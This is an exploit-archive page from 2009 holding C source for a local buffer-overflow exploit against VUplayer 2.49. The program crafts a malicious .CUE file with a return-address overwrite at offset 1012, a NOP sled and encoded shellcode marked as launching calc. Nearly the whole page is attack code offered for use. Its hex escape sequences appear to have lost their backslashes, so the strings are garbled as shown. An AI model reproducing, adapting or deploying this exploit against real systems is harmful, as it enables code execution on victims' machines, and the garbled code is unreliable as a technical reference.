VUplayer 2.49 .CUE File Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VUplayer 2.49 .CUE File Local Buffer Overflow Exploit
# Published : 2009-03-02
# Author : Assed Edin
# Previous Title : Media Commands (m3u File) Local SEH Overwrite Exploit
# Next Title : Hex Workshop v6 (.HEX File) Local Code Execution Exploit

/*

  Author: Assed Edin
  E-mail: storms0uth@hotmail.com
  GreetS : Xcracker & SimO-s0ft & Ga3 Drari Wlad MArrakech ^_^ o Manssawch Lyc???? Hassan2 & Str0ke
  
*/



#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#define OFFSET 1012


char header1[]=     
"x46x49x4cx45x20x22";

char header2[]= 
"x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20"
"x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32"
"x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31"
"x20x30x30x3ax30x30x3ax30x30";
//calc 343
char scode[]=
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08"
"x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7"
"x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb"
"x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f"
"x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4"
"x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6"
"x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09"
"x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea"
"x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86"
"x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

char NOP[]="x90x90x90x90";
int main(int argc,char *argv[]){
  FILE *openfile;
  unsigned char *buffer;
  unsigned int RET =0x7c836960;
  int offset=0;
  printf("Coded By Assad edin (Sat0rA-Cr3w - Moroccan Hackers)n");
  printf("Email : storms0uth@hotmail.comn");
  if ((openfile=fopen("wa33.cue","wb"))==NULL){
                                            perror("Canot open file");
                                            }
  buffer = (unsigned char *) malloc (OFFSET+4+strlen(NOP)+strlen(scode));
  memset(buffer,0x90,OFFSET+4+strlen(NOP)+strlen(scode));
  offset=OFFSET;
  memcpy(buffer+offset,&RET,4);
  offset+=4;
  memcpy(buffer+offset,NOP,strlen(NOP));
  offset+=strlen(NOP);
  memcpy(buffer+offset,scode,strlen(scode));
  offset+=strlen(scode);
  fputs(header1,openfile);
  fputs(buffer,openfile);
  fputs(header2,openfile);
  fclose(openfile);
  free(buffer);
  return 0;
}

// www.Syue.com [2009-03-02]